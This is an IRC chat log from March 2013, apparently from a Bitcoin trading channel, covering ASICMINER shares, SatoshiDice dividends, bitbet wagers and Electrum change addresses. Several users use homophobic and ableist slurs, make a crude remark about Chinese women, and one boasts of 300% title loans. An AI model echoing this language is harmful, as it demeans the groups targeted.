bitcoin Mar 04 21:45:24 he's a much more flamboyant leader than, say, gavin Mar 04 21:45:36 isn't budapest Rocco Siffredi's home? Mar 04 21:45:39 how's he a leader ? Mar 04 21:45:56 he is the man Mar 04 21:46:07 amen Mar 04 21:46:07 he will portray himself that way and the media will follow along Mar 04 21:46:22 so like obama. Mar 04 21:46:30 hey, i'm with you, i hope it happens Mar 04 21:46:40 more drama -> more value for btc. Mar 04 21:46:44 kim is jesus Mar 04 21:47:03 dub to quote some cartoon, he's jsut stupid and fat. Mar 04 21:47:56 idk about stupid, takes some ability to copy a business model and make buttloads off it Mar 04 21:48:33 dub this crashes into your ideas about the chinese. Mar 04 21:48:44 since they took ford's model and are currently raping the americans with it. Mar 04 21:48:54 I didn't say they were stupid Mar 04 21:49:05 but you didn't say they're jesus either. Mar 04 21:49:13 that is true Mar 04 21:51:10 what is NAT.ROUTERS Mar 04 21:51:28 kim's new project. Mar 04 21:51:51 I thought his new project was inventing crypto Mar 04 21:52:02 broken js crypto, to be precise. he's done that. Mar 04 21:52:08 now he invents ips Mar 04 22:00:37 Lyspooner: what does your question relate to? Mar 04 22:01:07 it's on the bottom of the mpex list of contracts Mar 04 22:01:55 right Mar 04 22:04:32 https://bitcointalk.org/index.php?topic=139337.0 deathbylolipop need to get in on this Mar 04 22:07:54 ;;ident burnside Mar 04 22:07:54 Nick 'burnside', with hostmask 'burnside!~burnside@12.9.242.2', is identified as user burnside, with GPG key id 990D4DB54ECDA3C6, key fingerprint 2EEB40C9DF5E25E6BD3A7BF8990D4DB54ECDA3C6, and bitcoin address None Mar 04 22:08:02 who pays 4 btc for that ?! Mar 04 22:08:29 caffeinewriter Mar 04 22:08:31 now what happens if six months down the road friedcat pulls a gigavps ? -- I think we would have to do the AML paperwork. Mar 04 22:08:52 burnside i'm just saying, you are underwriting a lot of risk that you can't control. Mar 04 22:09:45 definitely. thus the disclaimers in the contract. Mar 04 22:10:02 thus also the liquidity disparity. Mar 04 22:10:05 I'm more worried about their competition beating them out though than I am about friedcat running off. Mar 04 22:10:13 it's not your fault, best i can see, just asicminer acting very weird. Mar 04 22:10:34 Yeah, I can't figure out if it's the lack of sleep, or what. Mar 04 22:10:35 what is the weird acting? Mar 04 22:10:59 dub baiscally they choked their investors by refusing to list to the point that people out of sheer desperations made private pts Mar 04 22:11:15 now one of the most promising ipos of the year so far has been reduced to a 70 btc opening day. Mar 04 22:11:18 oh right Mar 04 22:11:35 god, why did I sold all these ASICMINER shares for 0.40 =/ Mar 04 22:11:47 Namworld: want to buy some? Mar 04 22:11:52 0.7 :) Mar 04 22:11:55 lol Mar 04 22:12:00 no, not buying Mar 04 22:12:03 Namworld the girl said .75 to 1.5 Mar 04 22:12:07 why don't you listen to the girl ? :D Mar 04 22:12:29 I sold some time ago? Before she even said anything I believe. Mar 04 22:12:38 a well then there's your answer ! Mar 04 22:12:43 you sold earlier. Mar 04 22:12:56 tbh tho, 0.4 is still 4x what you got 'em for, no? Mar 04 22:13:10 i think he paid a little premium Mar 04 22:13:10 not a bad return on ~6 months? Mar 04 22:13:28 i want to buy some but banks are too slow Mar 04 22:13:58 Also if Friedcat had shares trading again after GLBSE closed you would probably have been able to buy back my ASICMINER cheap to fill that short contract. Mar 04 22:15:44 Namworld at any point between october and january they could have listed and been tip top shape Mar 04 22:15:50 all through february and still acceptable Mar 04 22:15:56 mircea_popescu: so in reality your 'acting weird' could simply be explained by, inability to strategize Mar 04 22:15:59 but march is already dropping the ball. Mar 04 22:16:03 dub that is acting weird. Mar 04 22:16:12 to you maybe Mar 04 22:16:20 to me its just acting chinese Mar 04 22:16:34 doh Mar 04 22:16:36 i've not fucked enough chinese girls to have a clue so far. Mar 04 22:16:46 I should have bought these Mar 04 22:16:57 Instead of lending to Amazingrando. Mar 04 22:16:58 the failure here is your preconception of normal thiking Mar 04 22:17:04 thinking* Mar 04 22:17:04 Namworld: how much they're paying now? Mar 04 22:17:15 Anduck they paid like 2% or something like that. Mar 04 22:17:20 2.5% mebbe Mar 04 22:17:42 ASICMINER already sent a first payment? Mar 04 22:17:48 yes Mar 04 22:17:54 in other news, mpex db dump has been optimized to take up less space. nothing's broken, it's just naturally halfsized. Mar 04 22:17:59 Namworld yes. Mar 04 22:18:19 sweet! Mar 04 22:19:00 mircea_popescu: yeah they paid 0.025 btc/share Mar 04 22:19:02 or smth like that Mar 04 22:19:04 hmm... If you had bought back then 10k USD of bitcoins at 5 USD each for 2k BTC Mar 04 22:19:08 but i mean Mar 04 22:19:13 how much are they selling those shares for? Mar 04 22:19:32 Anduck !ticker btct asicminer-pt Mar 04 22:19:41 !ticker btct asicminer-pt Mar 04 22:19:42 [BTCT:ASICMINER-PT] 1D: 0.65 / 0.6502 / 0.655 (122 shares, 79.3 BTC), 7D: 0.65 / 0.6502 / 0.655 (122 shares, 79.3 BTC), 30D: 0.65 / 0.6502 / 0.655 (122 shares, 79.3 BTC) Mar 04 22:19:43 couldnt do it urself??? Mar 04 22:19:45 and bought 20k ASICMINER (10k USD). You'd now have 20k x 0.65 BTC = 13 000 BTC worth Mar 04 22:20:01 yup Mar 04 22:20:04 =) Mar 04 22:20:10 or close to half a million dollar at today's prices Mar 04 22:20:10 i was lucky Mar 04 22:20:12 Namworld no. things don't scale like that. you'd have ~70 btc's worth of shares and 12930 btc worth of paper & dreams. Mar 04 22:20:17 i bought asicminer with all my glbse stack xD Mar 04 22:20:48 mircea: I'm only evaluating current trading price. Mar 04 22:20:50 but -really- they buy asicminer for 0.65?? =D Mar 04 22:20:52 I LIKE THAT Mar 04 22:20:59 ya but you'r extrapolating a little out of band Mar 04 22:21:23 As long as ASICMINER keeps up like that. Mar 04 22:21:30 Anduck i think if you push burnside your stocks you get the pt and can trade Mar 04 22:21:33 Probably achievable. Mar 04 22:21:51 You could sell part for your initial 2k BTC no problem tho. Mar 04 22:21:54 you can push to Deadterra on BF too, he's free, and takes 0% of divs Mar 04 22:21:59 nah i dont wanna trade, mp Mar 04 22:22:02 no Namworld. if asicminer keeps up like it's currently doing it'll go to shit. Mar 04 22:22:12 they have to seriously adjust themselves. Mar 04 22:22:17 asicminer better get more hashing online soon Mar 04 22:22:23 eh Mar 04 22:22:53 this is certainly an exciting spring Mar 04 22:23:12 on a sidenote Mar 04 22:23:51 ;;calc 0.03 ** 30 Mar 04 22:23:52 0 Mar 04 22:23:57 ;;calc 0.03 ** 30.0 Mar 04 22:23:57 0 Mar 04 22:24:01 da fuck ?! Mar 04 22:24:06 o Mar 04 22:24:08 ;;calc 1.03 ** 30.0 Mar 04 22:24:09 2.42726247119 Mar 04 22:24:10 scale owned Mar 04 22:24:20 ;;calc 1.0003 ** 30.0 Mar 04 22:24:21 1.00903925984 Mar 04 22:24:29 uhh Mar 04 22:24:32 wait. what ? you're paying 1% a month ?~ Mar 04 22:24:42 Yeah Mar 04 22:24:50 A bit less Mar 04 22:24:52 and people are actually sending you btc ?! Mar 04 22:24:55 10.95% per year Mar 04 22:25:00 Yeah... Mar 04 22:25:08 lol ok Mar 04 22:25:23 but this is a. less than dividends for most stocks b. much less than mpoe bonds etc. Mar 04 22:25:23 this is btc Mar 04 22:25:32 i guess so lol Mar 04 22:25:54 But daily interest, callable at face value anytime. Mar 04 22:26:11 I guess the possibility to withdraw at face value anytime is interesting enough. Mar 04 22:26:20 we totally have to shed these paycheck loan faces off btc already Mar 04 22:27:48 Namworld: you pay interest daily? as divs oslt Mar 04 22:27:56 I used to work in title loans and payday lending. Mar 04 22:28:08 got away with %300 on title loans. Mar 04 22:28:13 customers loved us too. Mar 04 22:28:35 dub: yes Mar 04 22:28:57 [BTCTC] [BTC-TRADING-PT] 100 @ 0.1231 = 12.31 BTC [+] Mar 04 22:29:38 Comes to 300 satoshi per 0.01 BTC share daily. Mar 04 22:30:13 Did you look at the cars? Mar 04 22:30:26 I always wondered what would happen if I brought in the title to my wrecked car. Mar 04 22:30:27 It's not that bad actually. Mar 04 22:31:16 B0g4r7 50-50 you'd get a loan Mar 04 22:31:52 wow ltc is back on the rise. Network Hash Rate 1,018.123 GH/s Mar 04 22:32:13 If I tried at a few different loan places the odds get pretty good. Mar 04 22:32:19 B0g4r7_: we did, full checks. does it run, does it go into reverse, is anything spewing. Mar 04 22:32:19 heh Mar 04 22:32:40 then we'd give them 1/4 - 1/2 NADA value. they'd give us title Mar 04 22:33:31 only way around lending laws. Mar 04 22:34:10 did you have your lot and everything ? Mar 04 22:34:50 we housed at our associates property. tow lot. Mar 04 22:35:16 title loans and tows. Mar 04 22:35:27 good times. Mar 04 22:35:40 Throw in a bail bondsman, a PI, and a debt collection agency and you've got a full house. Mar 04 22:36:05 WE got into it from check cashing, so we were half-way there. Mar 04 22:36:30 in house collections. nice to know a skilled skip tracer Mar 04 22:36:42 course, internets makes their job easier these days Mar 04 22:53:37 [MPEX] [S.DICE] 1000 @ 0.005501 = 5.501 BTC [+] Mar 04 22:54:35 [MPEX] [S.DICE] 1000 @ 0.005501 = 5.501 BTC [+] Mar 04 22:55:36 [MPEX] [S.DICE] 1000 @ 0.005501 = 5.501 BTC [+] Mar 04 22:56:32 in 2001 kim dotcom bought 375,000 EUR worth of shares in letsbuyit.com and subsequently announced is intention to invest 50 million euros in the company. Mar 04 22:56:53 the announcement caused the share value of letsbuyit.com to jump and dotcom cashed out, making a profit of 1.5 million eur Mar 04 22:58:16 an den? Mar 04 22:58:38 and then he was arrested Mar 04 22:58:58 [MPEX] [S.DICE] 661 @ 0.005501 = 3.6362 BTC [+] Mar 04 22:59:07 this time he won't be arrested Mar 04 22:59:39 pretty sure he's gettign extradited from nz Mar 04 22:59:53 ::ticker Mar 04 23:00:05 ;;ticker Mar 04 23:00:08 BTCUSD ticker | Best bid: 36.27000, Best ask: 36.27099, Bid-ask spread: 0.00099, Last trade: 36.27700, 24 hour volume: 44153.48588405, 24 hour low: 34.16966, 24 hour high: 36.70000, 24 hour vwap: 35.37953 Mar 04 23:00:15 Lyspooner he's in jail already neh ? Mar 04 23:00:26 no Mar 04 23:00:30 orly ? Mar 04 23:01:21 he's on some form of bail iirc Mar 04 23:02:40 judge gave him bail after a bunch of illegal shit about his arrest surfaced Mar 04 23:03:46 o o i recall Mar 04 23:04:01 illegal surveillance, nz being a puppet state, yeah Mar 04 23:04:09 yeah Mar 04 23:04:26 the usual "we confiscate all your money now you go ahead hire lawyers" Mar 04 23:04:30 and all that jazz. Mar 04 23:05:56 and the lulzy.. spook dept. that isnt allowed to spy on nz citizens, didn't know he was a citizen Mar 04 23:06:24 ;;ticker Mar 04 23:06:25 BTCUSD ticker | Best bid: 36.27100, Best ask: 36.30000, Bid-ask spread: 0.02900, Last trade: 36.30000, 24 hour volume: 44219.25916777, 24 hour low: 34.16966, 24 hour high: 36.70000, 24 hour vwap: 35.38096 Mar 04 23:06:31 dude the oix is coming true omfg. Mar 04 23:06:37 ;;bc,convert eur Mar 04 23:06:38 1 BTC = 36.30000 U.S. dollars = 27.9488759 Euros Mar 04 23:06:48 Bugpowder you seeing this shit ? Mar 04 23:06:52 [MPEX] [S.DICE] 100 @ 0.0055 = 0.55 BTC [-] Mar 04 23:07:21 [MPEX] [S.DICE] 500 @ 0.00525106 = 2.6255 BTC [-] Mar 04 23:07:49 fuck this Mar 04 23:08:01 avearage iq on the forum is -20 Mar 04 23:08:05 seiing what? Mar 04 23:08:09 nowai? Mar 04 23:08:11 Kim? Mar 04 23:08:22 Kim is about to dump, suggset panic selling Mar 04 23:08:29 Lol Mar 04 23:08:44 nah he is gonna pump this shit up. Mar 04 23:09:02 Now my wife's girlfriends are asking me how to buy coins. Mar 04 23:09:09 FUCK Mar 04 23:09:15 yeah Mar 04 23:09:19 its a bubble when u get that. Mar 04 23:09:22 jk Mar 04 23:09:24 not yet Mar 04 23:09:24 yerp Mar 04 23:09:29 gotta be the shoeshiners Mar 04 23:09:39 when they tip you off. Time to sell. Mar 04 23:10:16 it's a trap Mar 04 23:10:17 hi Mar 04 23:10:40 sup, you Kim Dotcom? Mar 04 23:11:06 dude Mar 04 23:11:15 you gotta get MEGA to IPO on MPEX Mar 04 23:11:16 he invented pgp yo Mar 04 23:11:28 lol initials Mar 04 23:11:46 jurov: you around? Mar 04 23:12:17 by the way, good job on the OIX mircea Mar 04 23:13:11 mjr___ what's up? Mar 04 23:13:22 just referred my friend Mar 04 23:13:25 :) Mar 04 23:13:27 cool Mar 04 23:13:48 he signed up for coinbr, did the referral code and all that work out right? Mar 04 23:14:01 [MPEX] [S.MPOE] 8700 @ 0.00077308 = 6.7258 BTC [-] Mar 04 23:14:07 i have no idea tbh Mar 04 23:14:26 nice. Mar 04 23:14:41 but he has to fund to be able to do anything ofc. Mar 04 23:14:52 yeah he sent 30 Mar 04 23:15:14 ah, that was him. yes, it's well. Mar 04 23:15:25 waiting on it to verify now, i think Mar 04 23:15:34 haven't checked blockchain info in a few min Mar 04 23:15:56 ok, got two so far :) Mar 04 23:15:58 oh someone sent 30 yest.. so this is other one Mar 04 23:16:08 buy buy buy Mar 04 23:16:16 yes, just sent it Mar 04 23:17:12 i'm actually on his comp right now, he prob goes by pgp Mar 04 23:17:22 but he hasn't talked much on this channel Mar 04 23:18:39 your the best jurov thanks a bunch Mar 04 23:20:19 :) had to forward it, need to wait a bit Mar 04 23:21:50 [MPEX] [S.DICE] 3000 @ 0.0056 = 16.8 BTC [+] Mar 04 23:23:04 [HAVELOCK] [SDICE] 4 @ 0.6 = 2.4 BTC [+] Mar 04 23:23:05 [HAVELOCK] [SDICE] 21 @ 0.596 = 12.516 BTC [-] Mar 04 23:23:07 [HAVELOCK] [SDICE] 5 @ 0.595 = 2.975 BTC [-] Mar 04 23:26:16 dice div come through? Mar 04 23:26:26 not yet Mar 04 23:26:35 deposit is in though Mar 04 23:26:38 assbot will tell you when that happens Mar 04 23:26:39 where's that pic of the cats Mar 04 23:26:43 and yes, assbot now says Mar 04 23:26:56 he will fart out the dividend. Mar 04 23:26:58 it Mar 04 23:27:02 she for jurov Mar 04 23:27:23 mircea_popescu, will you delist s.dice if erik won't make it in 3 hours? Mar 04 23:27:31 DOO IT Mar 04 23:27:34 lol. Mar 04 23:27:41 well, actually, the 5th is tomorrow Mar 04 23:27:54 it says before 5th Mar 04 23:28:22 OMG Mar 04 23:28:25 Look at that bitbet Mar 04 23:28:26 xD Mar 04 23:28:29 200 BTC on NO Mar 04 23:28:31 Woww Mar 04 23:28:32 hahahaha Mar 04 23:28:48 (e)The representatives of SatoshiDice solemnly promise and warrant that complete and accurate Statements of Profit and Loss for each calendar month will be published by them no later than by the fifth day of the new month. Mar 04 23:28:59 (f)Immediately upon publication of each Statement of Profit and Loss SatoshiDice will pay to shareholders Mar 04 23:29:19 well... e he did, f however no. let's see what he's up to Mar 04 23:29:53 Bowjob which one ? Mar 04 23:30:25 the BFL one Mar 04 23:30:44 I was leaning on "yes" since apparently they are getting their shit together.. now im not sure again Mar 04 23:31:06 Yifu apparently bet on the BFL march bet and won a fuckton Mar 04 23:31:23 http://bitbet.us/bet/265/bfl-will-deliver-asic-devices-before-april-1st/ Mar 04 23:32:04 which was he, the 700 or the 600 ? Mar 04 23:32:37 huh,.? Mar 04 23:33:00 he's probably the one who put up 300++ BTC Mar 04 23:33:27 http://bitbet.us/bet/265/bfl-will-deliver-asic-devices-before-april-1st/ Mar 04 23:33:30 le wow, 10:1 huh Mar 04 23:33:41 mhm. I thought it was you Mar 04 23:34:35 maybe it's josh Mar 04 23:37:42 haha wtf Mar 04 23:38:01 trendon shavers showing up in my linkedin cloud Mar 04 23:38:06 lol Mar 04 23:38:30 lol Mar 04 23:38:39 add him Mar 04 23:38:40 I have no bitcoiners on there so srsly wtfing Mar 04 23:38:47 and endorce him for pyramid marketing Mar 04 23:39:00 PH there too Mar 04 23:39:15 maybe its groping the scammurs Mar 04 23:39:19 I must have stalked them at some point Mar 04 23:44:44 dub: http://www.bash.org/?115 Mar 04 23:45:49 what's up in here - been a minute since I've been in Mar 04 23:45:50 http://bitbet.us/bet/284/primeasic-has-a-miner/ Mar 04 23:45:52 there we go. Mar 04 23:46:00 o hi guruvan Mar 04 23:46:18 ohai MP - how's things? good to see you Mar 04 23:46:20 iz: lol Mar 04 23:47:06 Does bitbet work linke BoB where they close the statement to betting if it becomes moot? Mar 04 23:47:16 mircea_popescu: bitbet looks pretty good - was checking it out today some Mar 04 23:47:31 i think it's getting some traction Mar 04 23:47:36 Like, suppose BFL ships March 10, will the bet still be open? Mar 04 23:47:37 at least by the cooked graphs i have here. Mar 04 23:48:01 I know they won't but if they did... Mar 04 23:48:03 B0g4r7 nah, once it's clear a bet ended early they get closed Mar 04 23:48:22 it's not INSTANTANEOUS mind you, Mar 04 23:48:26 but nevertheless. Mar 04 23:49:28 http://betsofbitco.in/item?id=447 Mar 04 23:49:30 "If no product has shipped by February 28th/2013, the product shall be considered vapourware and the statement shall be ruled as draw." Mar 04 23:49:36 I just got refunded for that one. Mar 04 23:49:37 umm Mar 04 23:49:39 wait,d raw ?! Mar 04 23:50:02 wtf bullshit bfl sponsored meni rosenfeld crap is this Mar 04 23:50:07 ya rly Mar 04 23:50:24 "we're making a bet except if we lose it's really get our money back" Mar 04 23:50:47 why does only faggy shit get through bash.org mods Mar 04 23:50:48 http://www.bash.org/?952948 Mar 04 23:50:52 no wonder josh was spewing all that bs about bitbet. Mar 04 23:51:02 kinda hurts to have people that won't push scams huh. Mar 04 23:51:13 yeah I was going to drop major coin on that bfl bet, then I read the fine print.... DRAW? Mar 04 23:51:25 none of the comedy gold I've submitted over the years has made it Mar 04 23:53:08 "This is gold, Jerry! Pure gold!" Mar 04 23:53:22 bah bitbet is so red Mar 04 23:53:26 cmon guys be more positive Mar 04 23:55:03 lol. Im confused now.. I want to be on blue.. but WTF Mar 04 23:55:04 [MPEX] [S.DICE] 846 @ 0.005501 = 4.6538 BTC [-] Mar 04 23:55:42 http://bitbet.us/bet/284/primeasic-has-a-miner/ somebody likes prime ? Mar 04 23:55:44 It's the 10% of advertised specs part that has me worried Mar 04 23:55:52 ;;calc 12/0.07 Mar 04 23:55:53 171.428571429 Mar 04 23:55:57 &estimate Mar 04 23:55:58 Next difficulty estimate | 4900626.90236 based on data since last change | 4958374.43923 based on data for last three days Mar 04 23:56:25 Maybe primeasic pirated Avalon's chip design. Mar 04 23:56:33 It'd be about right for the power numbers. Mar 04 23:57:03 [HAVELOCK] [SDICE] 4 @ 0.5951 = 2.3804 BTC [+] Mar 04 23:57:05 [HAVELOCK] [SDICE] 5 @ 0.595 = 2.975 BTC [-] Mar 04 23:57:06 chinese guy's hungarian girlfriend ? Mar 04 23:57:12 if avalon is really a fpga's hardcopy, baybe they just used same blob Mar 04 23:57:13 lol Mar 04 23:57:32 hardcopy doesn't come in QFN. Mar 04 23:58:31 it'd be really retarded to make asics as fpga hardcopy wtf. Mar 04 23:58:37 nobody can be that dumb Mar 04 23:59:28 who knows about blockhain.info here Mar 04 23:59:34 they are posting the wrong totals on my account Mar 04 23:59:52 http://blockchain.info/address/152mAXabBVjB58bASMzZEJzPPU84gEgjZR Mar 05 00:00:03 it should have 195 BTC on that address, not 169 Mar 05 00:00:14 my electrum says 195.. Mar 05 00:01:05 this transaction doesnt make sense, I only spent 56 BTC here Mar 05 00:01:05 http://blockchain.info/tx/a1a8111cb8c26e8ae1a06dcf1895e0b0e52c084673a9df5cc703abff0a48336c Mar 05 00:01:09 it says 82 total Mar 05 00:01:09 wtf Mar 05 00:01:27 every other bash quote is from some homo efnet oper Mar 05 00:02:00 its a fucking circlejerk Mar 05 00:03:40 dub welcome to internets Mar 05 00:03:48 Bowjob prolly best harass piuk in forum Mar 05 00:03:53 and also tell him to get on irc :D Mar 05 00:04:16 Bowjob, the rest got sent to a "balance address". Mar 05 00:04:32 whats a balance address Mar 05 00:04:41 fyi, I only used 1 address ^ Mar 05 00:04:51 Bowjob that's how we make money. Mar 05 00:05:08 I'm not entirely clear on it. I think it happens when it needs to split funds or something. Mar 05 00:05:16 bitcoin financial elite steals from ordinary users by redirecting some random % of some txs Mar 05 00:05:21 It gets sent to a newly-generated address that then gets placed i your wallet. Mar 05 00:05:28 in Mar 05 00:05:48 The ppl in #bitcoin-dev would know better. Mar 05 00:06:09 eh.. i dont understand lol Mar 05 00:06:19 Bowjob it's like this : you can only spend a WHOLE input. Mar 05 00:06:27 B0g4r7_: so you had 82.308 in a single bitcoin address, and you wanted to spend 56.82.. so 56.82 goes to where you want to spend it, and then 25.48 comes back in change to one of your new randomly generated wallet addresses Mar 05 00:06:30 like, if you have 50 btc, the next time you spend ANY btc yougotta spend the whole 50 Mar 05 00:06:40 iz: pretty much. Mar 05 00:06:42 the way this works in practice is that you send however much to who you owe Mar 05 00:06:47 and the rest to another address of yours Mar 05 00:07:11 and iz iz fasterz than mez ;/ Mar 05 00:07:25 but.. one thing I don't get.. where is that 25 BTC sent? Mar 05 00:07:30 I use electrum, only 5 addys Mar 05 00:07:38 I checked the rest, I don't have them Mar 05 00:07:40 hm Mar 05 00:07:43 It goes to a newly-generated address in your wallet. Mar 05 00:07:51 but I can't see the address? Mar 05 00:07:55 The addresses are hidden somehow (maybe?) Mar 05 00:08:06 idk Electrum really. Mar 05 00:08:22 yes, its hidden.. umm, but my total says 200 BTC Mar 05 00:08:32 so it must be here, then its hidden? wtf Mar 05 00:08:50 Maybe ask #electrum Mar 05 00:08:56 mmk Mar 05 00:13:55 [MPEX] [S.BBET] 500 @ 0.00175 = 0.875 BTC [-] Mar 05 00:20:07 ;;ticker Mar 05 00:20:07 BTCUSD ticker | Best bid: 36.01100, Best ask: 36.30000, Bid-ask spread: 0.28900, Last trade: 36.01100, 24 hour volume: 45723.66365557, 24 hour low: 34.19000, 24 hour high: 36.70000, 24 hour vwap: 35.42630 Mar 05 00:26:58 yeap. Mar 05 00:27:00 1G6evBnvqzZ3mDoxbjWivFLVzcG9JBhfXR Mar 05 00:27:11 It's in this address.. I just don't see it on my client Mar 05 00:31:55 mircea_popescu: so evoorhees will actually have to issue a dividend of 6619BTC to cover all 50,000,000 shares? Mar 05 00:32:55 [BTCTC] [ASICMINER-PT] 2 @ 0.65 = 1.3 BTC [-] Mar 05 00:34:22 maximian im not sure of the exact figure. how much did sdice make in feb ? Mar 05 00:34:39 13000+ BTC Mar 05 00:35:33 then yes Mar 05 00:35:35 evoorhees wrote that he'll be paying 1721BTC, which I assume he calculated based on 13M shares, which works out to 0.00013238 per share Mar 05 00:35:38 OK Mar 05 00:35:59 course most of it goes back to him i imagine, so it prolly works out to that Mar 05 00:36:05 right Mar 05 00:36:18 but yeah, a great way to verify income Mar 05 00:36:52 at least half of it anyway Mar 05 00:40:01 o looky https://bitcointalk.org/index.php?topic=147914.msg1582968#msg1582968 Mar 05 00:47:12 maximian kinda the idea. Mar 05 00:48:28 o hey check that stuff out! Mar 05 00:49:34 on bitbet, create a long-dated bet with a close to 50-50 outcome, bet both sides of it, take advantage of the early weighting part of the algorithm Mar 05 00:49:44 amirite Mar 05 00:50:43 may work, yes. Mar 05 00:50:53 you underwrite the marketmaker risk for a possible profit down the road. Mar 05 00:51:26 im sure as more people figure out what's what there's going to be bookmaking of this sort, for everyone's benefit Mar 05 00:51:33 (ocasional better gets stabler odds) Mar 05 00:53:07 it's an interesting way to earn positive interest rates on deposits at the expense of later bettors Mar 05 00:53:31 leading bitcoin financial instruments since 2012. Mar 05 00:53:41 what, bitbet? Mar 05 00:53:44 Lyspooner: yes of course Mar 05 00:53:52 This is what I did with the NFL bets Mar 05 00:54:07 Also set the ratio at the real moneyline Mar 05 00:54:27 nice Mar 05 00:54:48 i did something like that, where i just bought a bunch of bitcoins with money Mar 05 00:54:54 There is actually an optimal amount to rebet as well, against any bets that move the odds away from the line Mar 05 00:55:21 however rebetting only works well if you have set the time decay such that there is little or no decay Mar 05 00:58:57 http://i45.tinypic.com/2uz8ao3.png Mar 05 00:59:06 My prediction back in december Mar 05 00:59:09 boy I was wrong Mar 05 00:59:10 lol Mar 05 00:59:28 critticall did a better job. Mar 05 01:02:35 LTC is now at 13 cents.. da fuck is going on Mar 05 01:05:26 retards Mar 05 01:07:30 retards must has bubble. Mar 05 01:10:06 [MPEX] [S.MPOE] 4018 @ 0.00078 = 3.134 BTC [+] Mar 05 01:10:08 [MPEX] [S.MPOE] 10000 @ 0.000781 = 7.81 BTC [+] Mar 05 01:10:09 [MPEX] [S.MPOE] 3400 @ 0.00078284 = 2.6617 BTC [+] Mar 05 01:11:36 [MPEX] [S.DICE] 600 @ 0.0055001 = 3.3001 BTC [-] Mar 05 01:12:52 ;;ticker Mar 05 01:12:53 BTCUSD ticker | Best bid: 36.01300, Best ask: 36.33600, Bid-ask spread: 0.32300, Last trade: 36.01300, 24 hour volume: 46753.53869852, 24 hour low: 34.19000, 24 hour high: 36.70000, 24 hour vwap: 35.45420 Mar 05 01:25:40 ;;ticker Mar 05 01:25:41 BTCUSD ticker | Best bid: 36.07110, Best ask: 36.33000, Bid-ask spread: 0.25890, Last trade: 36.07110, 24 hour volume: 46733.12002181, 24 hour low: 34.19000, 24 hour high: 36.70000, 24 hour vwap: 35.45680 Mar 05 01:26:31 [BTCTC] [S.DICE-PT] 65 @ 0.0059 = 0.3835 BTC [+] Mar 05 01:32:12 the electrum irc is useless Mar 05 01:32:17 everyone there is in limbo Mar 05 01:36:03 [HAVELOCK] [HIM] 1 @ 1.4001 BTC [+] Mar 05 01:39:03 [HAVELOCK] [HIM] 1 @ 1.4001 BTC [+] Mar 05 01:42:38 [MPEX] [O.BTCUSD.C390T] 5 @ 0.18595405 = 0.9298 BTC [+] Mar 05 01:48:04 [HAVELOCK] [SDICE] 4 @ 0.595 = 2.38 BTC [-] Mar 05 01:48:05 [MPEX] [S.DICE] [PAID] 6,621.40925 BTC to 50`000`000 shares, 13242 satoshi per share Mar 05 01:48:19 nice! Mar 05 01:49:45 cool. Mar 05 01:51:03 [HAVELOCK] [HIM] 1 @ 1.4000101 BTC [-] Mar 05 01:51:04 [HAVELOCK] [HIM] 15 @ 1.40001001 = 21.0002 BTC [-] Mar 05 01:51:22 [BTCTC] [BASIC-MINING] 2 @ 0.34499 = 0.69 BTC [+] Mar 05 01:53:15 [MPEX] [S.DICE] 1620 @ 0.005967 = 9.6665 BTC [+] Mar 05 01:53:42 wait. Mar 05 01:53:52 what the fucking hell it downtrends pre div and then UPTRENDS post div ? Mar 05 01:54:45 As usual Mar 05 01:55:01 does this make any sense ?! Mar 05 01:55:46 Maybe if people think he ain't gonna pay Mar 05 01:55:56 i guess... Mar 05 01:56:05 maybe somebody was trying to create a sell panic Mar 05 01:56:39 Small volume anyway Mar 05 01:57:55 this is true Mar 05 01:58:00 maybe some people reinvesting divs Mar 05 01:58:15 Yeah that is it Mar 05 01:58:21 [MPEX] [S.DICE] 400 @ 0.00596998 = 2.388 BTC [+] Mar 05 01:58:22 [MPEX] [S.DICE] 2000 @ 0.00596999 = 11.94 BTC [+] Mar 05 01:58:23 Most likely Mar 05 01:58:30 [MPEX] [S.DICE] 4600 @ 0.00597 = 27.462 BTC [+] Mar 05 01:58:31 [MPEX] [S.DICE] 619 @ 0.00598 = 3.7016 BTC [+] Mar 05 01:58:37 [MPEX] [S.DICE] 147 @ 0.00599999 = 0.882 BTC [+] Mar 05 01:58:39 [MPEX] [S.DICE] 1661 @ 0.00599999 = 9.966 BTC [+] Mar 05 01:58:44 oooh Mar 05 01:58:48 [MPEX] [S.DICE] 5000 @ 0.006 = 30 BTC [+] Mar 05 01:58:50 [MPEX] [S.DICE] 1000 @ 0.00600768 = 6.0077 BTC [+] Mar 05 01:58:56 [MPEX] [S.DICE] 7695 @ 0.00611032 = 47.0189 BTC [+] Mar 05 01:58:57 [MPEX] [S.DICE] 3536 @ 0.00620077 = 21.9259 BTC [+] Mar 05 02:00:34 "maybe some people reinvesting divs" Mar 05 02:01:51 is why it always goes up after divs, it's a testament to SDICE's allure Mar 05 02:02:48 !ticker m s.dice Mar 05 02:02:49 [MPEX:S.DICE] 1D: 0.00500002 / 0.00587605 / 0.00620077 (53227 shares, 312.76 BTC), 7D: 0.0048 / 0.00584889 / 0.0063799 (341165 shares, 1,995.44 BTC), 30D: 0.0042 / 0.00595448 / 0.007395 (6741410 shares, 40,141.61 BTC) Mar 05 02:04:22 [MPEX] [S.BBET] 700 @ 0.0015 = 1.05 BTC [-] Mar 05 02:05:00 [MPEX] [S.MPOE] 5652 @ 0.00078628 = 4.4441 BTC [+] Mar 05 02:06:03 [MPEX] [S.MPOE] 1399 @ 0.00075212 = 1.0522 BTC [-] Mar 05 02:06:05 [MPEX] [S.MPOE] 16940 @ 0.00075072 = 12.7172 BTC [-] Mar 05 02:14:17 [MPEX] [S.MPOE] 2280000 @ 0.00075 = 1710 BTC [-] Mar 05 02:14:54 [BTCTC] [S.DICE-PT] 96 @ 0.0059 = 0.5664 BTC [+] Mar 05 02:15:57 I wish betbet resolutions were as fast as s.dices. Mar 05 02:16:19 [MPEX] [S.DICE] 200 @ 0.00620076 = 1.2402 BTC [-] Mar 05 02:16:19 hey, can anyone tell me if this last bet on http://bitbet.us/bet/267/btc-usd-at-mt-gox-will-hit-35-in-march/ will be refunded? Mar 05 02:16:21 [MPEX] [S.DICE] 5336 @ 0.00620077 = 33.0873 BTC [+] Mar 05 02:16:23 [MPEX] [S.DICE] 134464 @ 0.006225 = 837.0384 BTC [+] Mar 05 02:16:28 if only that were possible. Mar 05 02:17:02 because I made that bet like three hours before it got confirmed, and I really want it to not be refunded. Mar 05 02:17:03 the_silent_wande not likely Mar 05 02:17:11 it would make you a sort of magical unicorn, able to determine outcomes of user submitted gobshite bets Mar 05 02:17:14 still like 5 days to go or w/e Mar 05 02:17:24 mircea_popescu thank you. Mar 05 02:18:04 the_silent_wande: are 